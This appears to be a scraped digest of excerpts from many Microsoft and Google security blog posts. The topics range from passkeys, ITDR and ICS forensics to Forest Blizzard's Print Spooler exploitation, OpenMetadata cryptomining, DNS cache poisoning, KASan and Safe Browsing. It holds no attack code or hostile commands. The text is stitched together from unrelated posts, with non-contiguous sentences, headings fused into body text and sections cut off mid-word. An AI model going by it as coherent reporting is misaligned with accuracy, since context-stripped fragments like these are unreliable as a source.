Last November, we launched the Secure Future Initiative (SFI) to prepare for the increasing scale and high stakes of cyberattacks.

Monitor and detect threatsComprehensive coverage and automatic detection of threats to Microsoft production infrastructure and services.

As part of this, we are taking the following actions:Maintain a current inventory across 100% of Microsoft production infrastructure and services.

Automatically detect and respond rapidly to anomalous access, behaviors, and configurations across 100% of Microsoft production infrastructure and services.

Driving continuous improvementThe Secure Future Initiative empowers all of Microsoft to implement the needed changes to deliver…

Today, we’re announcing passkey support for Microsoft consumer accounts, the next step toward our vision of simple, safe access for everyone.

Starting today, you can use a passkey to access your Microsoft account using your face, fingerprint, or device PIN on Windows, Google, and Apple platforms.

Creating a passkey for your Microsoft accountCreating a passkey for your Microsoft account is easy.

Signing into your Microsoft account using a passkeyWhen you sign in to your Microsoft account, you can use your passkey by choosing Sign-in options and then selecting face, fingerprint, PIN, or security key.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news an…

This blog was co-authored by Alex Weinert, VP Identity Security and Ramya Chitrakar, CVP Apps and Identity.

Today we are thrilled to announce that Microsoft has been recognized as an overall leader in the KuppingerCole Leadership Compass Identity Threat Detection and Response: IAM Meets the SOC.

Figure 1: ITDR Leadership compass with Microsoft as a leaderStreamline your identity protection with ITDR and generative AIAt Microsoft, we look at ITDR as a set of capabilities at the intersection of Identity and Access Management (IAM) and Extended Detection and Response (XDR).

Proactively protect your on-premises resources and harden your identity posture: Misconfiguration s in identity infrastru…

Microsoft remains committed to working with the security community to share vulnerability discoveries and threat intelligence to protect users across platforms.

We also wish to thank Google’s Android Application Security Research team for their partnership in resolving this issue.

For example, it’s very common for Android applications to read their server settings from the shared_prefs directory.

RecommendationsRecognizing that this vulnerability pattern may be widespread, we shared our findings with Google’s Android Application Security Research team.

We collaborated with Google to author guidance for Android application developers to help them recognize and avoid this pattern.

Challenges in ICS forensicsICS forensics differs from standard IT forensics, because ICS environments possess distinctive features that distinguish them.

In contrast, forensics in OT environments involves analyzing ICS data, including data from sensors and controllers used in manufacturing and industrial settings.

Specialized tools and techniques have started to emerge to address the unique challenges of conducting investigations in ICS environments.

Defender for IoT, or any other OT security solution, can help with both proactive and reactive OT incident response.

To get started with OT security, watch the “Introduction to ICS/OT Security” webinar series, hosted by Microsoft Security Commu…

Insight #3: Effective cybersecurity takes a good partnerThe next wave of multicloud security with Microsoft Defender for Cloud Read moreKeeping user needs in mind, Microsoft has its own CNAPP solution—Microsoft Defender for Cloud.

Operationalizing Microsoft Defender for Cloud takes both integrating it into daily operations and satisfying your users’ needs by continuously evolving cloud security.

Strengthening the SOC even further is a new Microsoft Defender for Cloud integration with Microsoft Defender XDR.

The future holds significant promise for CNAPP, and Microsoft is leading in this effort with solutions like Microsoft Defender for Cloud.

Also, follow us on LinkedIn (Microsoft Security)…

To help like-minded defenders tackle this difficult task, Microsoft Incident Response experts have created a guide on using Windows Internals for forensic investigations.

Guidance for Incident Responders The new guide from the Microsoft Incident Response team helps simplify forensic investigations.

Understanding these artifacts will strengthen your ability to conduct Windows forensic analysis.

Shimcache’s forensic evolution : The Shimcache has long served as a source of forensic information, particularly as evidence of program execution.

Forensic insights with SRUM : SRUM’s tracking of application execution, network activity, and resource consumption is a boon for forensic analysts.

Microsoft Threat Intelligence is publishing results of our longstanding investigation into activity by the Russian-based threat actor Forest Blizzard (STRONTIUM) using a custom tool to elevate privileges and steal credentials in compromised networks.

Forest Blizzard often uses publicly available exploits in addition to CVE-2022-38028, such as CVE-2023-23397.

In addition to patching, this blog details several steps users can take to defend themselves against attempts to exploit Print Spooler vulnerabilities.

Forest Blizzard primarily targets government, energy, transportation, and non-governmental organizations in the United States, Europe, and the Middle East.

To hear stories and insights f…

Microsoft recently uncovered an attack that exploits new critical vulnerabilities in OpenMetadata to gain access to Kubernetes workloads and leverage them for cryptomining activity.

Attack flowFor initial access, the attackers likely identify and target Kubernetes workloads of OpenMetadata exposed to the internet.

Once they identify a vulnerable version of the application, the attackers exploit the mentioned vulnerabilities to gain code execution on the container running the vulnerable OpenMetadata image.

In this specific case, the attackers’ actions triggered Microsoft Defender for Containers alerts, identifying the malicious activity in the container.

Microsoft Defender Cloud Security Pos…

Today, we are excited to announce Zero Trust activity-level guidance for DoD Components and DIB partners implementing the DoD Zero Trust Strategy.

In this blog, we’ll review the DoD Zero Trust Strategy and discuss how our new guidance helps DoD Components and DIB partners implement Zero Trust.

We’ll cover the Microsoft Zero Trust platform and relevant features for meeting DoD’s Zero Trust requirements, and close with real-world DoD Zero Trust deployments.

Microsoft supports the DoD’s Zero Trust StrategyThe DoD released its formal Zero Trust Strategy in October 2022.1 The strategy is a security framework and mindset that set a path for achieving Zero Trust.

There are 152 Zero Trust activitie…

And as their tactics evolve in sophistication and scale, we continually adapt and enhance our advanced security features and AI-powered protections to help keep Android users safe.

Google Play Protect live threat detectionGoogle Play Protect now scans 200 billion Android apps daily, helping keep more than 3 billion users safe from malware.

The detection of suspicious behavior is done on device in a privacy preserving way through Private Compute Core, which allows us to protect users without collecting data.

This is helpful for apps that want to hide sensitive information from other apps and protect users from scams.

This is helpful for apps that want to hide sensitive information from other…

Google and Apple have worked together to create an industry specification – Detecting Unwanted Location Trackers – for Bluetooth tracking devices that makes it possible to alert users across both Android and iOS if such a device is unknowingly being used to track them.

This will help mitigate the misuse of devices designed to help keep track of belongings.

Google is now launching this capability on Android 6.0+ devices, and today Apple is implementing this capability in iOS 17.5.

If a user gets such an alert on their Android device, it means that someone else’s AirTag, Find My Device network-compatible tracker tag, or other industry specification-compatible Bluetooth tracker is moving with …

Passkeys and security keysPasskeys are an evolution of security keys, meaning users get the same security benefits, but with a much simplified experience.

By storing the passkey on a security key, users can ensure that passkeys are only available when the security key is plugged into their device, creating a stronger security posture.

Security keys provide an alternate way to use your passkeys across your devices: by bringing your security keys with you.

This replaces your remotely stored password with the PIN you used to unlock your security key, which improves user security.

However users are still required to present two security keys when enrolling into the program.

BackgroundChromium based browsers on Windows use the DPAPI (Data Protection API) to secure local secrets such as cookies, password etc.

This event was added to the Microsoft-Windows-Crypto-DPAPI stream which manifests in the Event Log in the Applications and Services Logs > Microsoft > Windows > Crypto-DPAPI part of the Event Viewer tree.

here is Chrome browser launching from explorer: 4688 2 0 13312 0 0x8020000000000000 78258343 Security WIN-GG82ULGC9GO.contoso.local S-1-5-18 WIN-GG82ULGC9GO$ CONTOSO 0xe8c85cc 0x17eac C:\Program Files\Google\Chrome\Application\chrome.exe %%1938 0x16d8 "C:\Program Files\Google\Chrome\Application\chrome.exe" S-1-0-0 - - 0x0 C:\Windows\explorer.exe…

A safe and trusted Google Play experience is our top priority.

The Alliance will support industry-wide adoption of app security best practices and guidelines, as well as countermeasures against emerging security risks.

This new capability has already detected over 5 million new, malicious off-Play apps, which helps protect Android users worldwide.

Looking AheadProtecting users and developers on Google Play is paramount and ever-evolving.

We're launching new security initiatives in 2024, including removing apps from Play that are not transparent about their privacy practices.

Using generative AI we could write summaries 51% faster while also improving the quality of them.

Our incident response approachWhen suspecting a potential data incident, for example,we follow a rigorous process to manage it.

Closure: After the remediation efforts conclude, and after a data incident is resolved, reviewing the incident and response to identify key areas for improvement.

Continuous improvement: Is crucial for the development and maintenance of incident response programs.

This experiment showed that generative AI can evolve beyond high level summarization and help draft complex communications.

In this blog post, we'll share how the Google security team uses the Reporting API to detect potential issues and identify the actual problems causing them.

Note that in a typical roll out, we iterate steps 1 through 3 to ensure that we have triaged all violation reports.

With the Reporting API, we have the ability to run this cycle using a unified reporting endpoint and a single schema for several security features.

Most reports generated via the Reporting API are violation reports, but not all — other types include deprecation reports and crash reports.

Over the years, Google has developed a number of techniques to collect, digest, and summarize violation reports into root causes.

Generative AI has emerged as a powerful and popular tool to automate content creation and simple tasks.

In this blog post, we'll explore reporting and enforcement policies that enterprise security teams can implement within Chrome Enterprise Premium for data loss prevention (DLP).

Chrome Enterprise DLP rules give IT admins granular control over browser activities, such as entering financial information in Gen AI websites.

As enterprises work through their policies and processes involving GenAI, Chrome Enterprise Premium empowers them to strike the balance that works best.

Learn more about how Chrome Enterprise can secure businesses just like yours here.

How location crowdsourcing works on the Find My Device networkThe Find My Device network locates devices by harnessing the Bluetooth proximity of surrounding Android devices.

Nearby Android devices participating in the Find My Device network report the location of the Bluetooth tag.

With end-to-end encrypted location data, Google cannot decrypt, see, or otherwise use the location data.

The Find My Device network is also compliant with the integration version of the joint industry standard for unwanted tracking.

We have an unwavering commitment to continue to improve user protections on Find My Device and prioritize user safety.

In this post, we will look at DNS cache poisoning attacks and how Google Public DNS addresses the risks associated with them.

DNS Cache Poisoning AttacksDNS lookups in most applications are forwarded to a caching resolver (which could be local or an open resolver like.

For an excellent introduction to cache poisoning attacks, please see “An Illustrated Guide to the Kaminsky DNS Vulnerability”.

Cache poisoning mitigations in Google Public DNSImproving DNS security has been a goal of Google Public DNS since our launch in 2009.

To enhance DNS security, we recommend that DNS server operators support one or more of the security mechanisms described here.

Address Sanitizer (ASan) overviewAddress sanitizer is a compiler-based instrumentation tool used to identify invalid memory access operations during runtime.

The KASan runtime routines implemented in the Linux kernel serve as a great example of how to define a KASan runtime for targets which aren’t supported by default with -fsanitize=address .

Memory access checkThe routines __asan_loadXX_noabort , __asan_storeXX_noabort perform verification of memory access at runtime.

This routine takes as input a target memory address and sets the corresponding byte in shadow memory to the value of YY .

Essentially, we would need to instrument the memory allocator with the code which unpoisons KASan sha…

That’s why we're excited to announce a new version of Safe Browsing that will provide real-time, privacy-preserving URL protection for people using the Standard protection mode of Safe Browsing in Chrome.

Introducing real-time, privacy-preserving Safe BrowsingHow it worksIn order to transition to real-time protection, checks now need to be performed against a list that is maintained on the Safe Browsing server.

With OHTTP, Safe Browsing does not see your IP address, and your Safe Browsing checks are mixed amongst those sent by other Chrome users.

Since the privacy server doesn’t know the private key, it cannot decrypt the hash prefixes, which offers privacy from the privacy server itself.

I…

To further our engagement with top security researchers, we also hosted our yearly security conference ESCAL8 in Tokyo.

Android and Google DevicesIn 2023, the Android VRP achieved significant milestones, reflecting our dedication to securing the Android ecosystem.

The Google Play Security Reward Program continued to foster security research across popular Android apps on Google Play.

All of this resulted in $2.1M in rewards to security researchers for 359 unique reports of Chrome Browser security bugs.

Thank you to the Chrome VRP security researcher community for your contributions and efforts to help us make Chrome more secure for everyone!

The latest news and insights from Google on security and safety on the Internet

Google Play, for example, carries out rigorous operational reviews to ensure app safety, including proper high-risk API use and permissions handling.

We recently launched enhanced Google Play Protect real-time scanning to help better protect users against novel malicious Internet-sideloaded apps.

This feature, now deployed on Android devices with Google Play Services in India, Thailand, Singapore and Brazil, has already made a significant impact on user safety.

To help better protect Android users from these financial fraud attacks, we are piloting enhanced fraud protection with Google Play Protect.

Our commitment to protecting Android usersWe believe industry collaboration is essential to …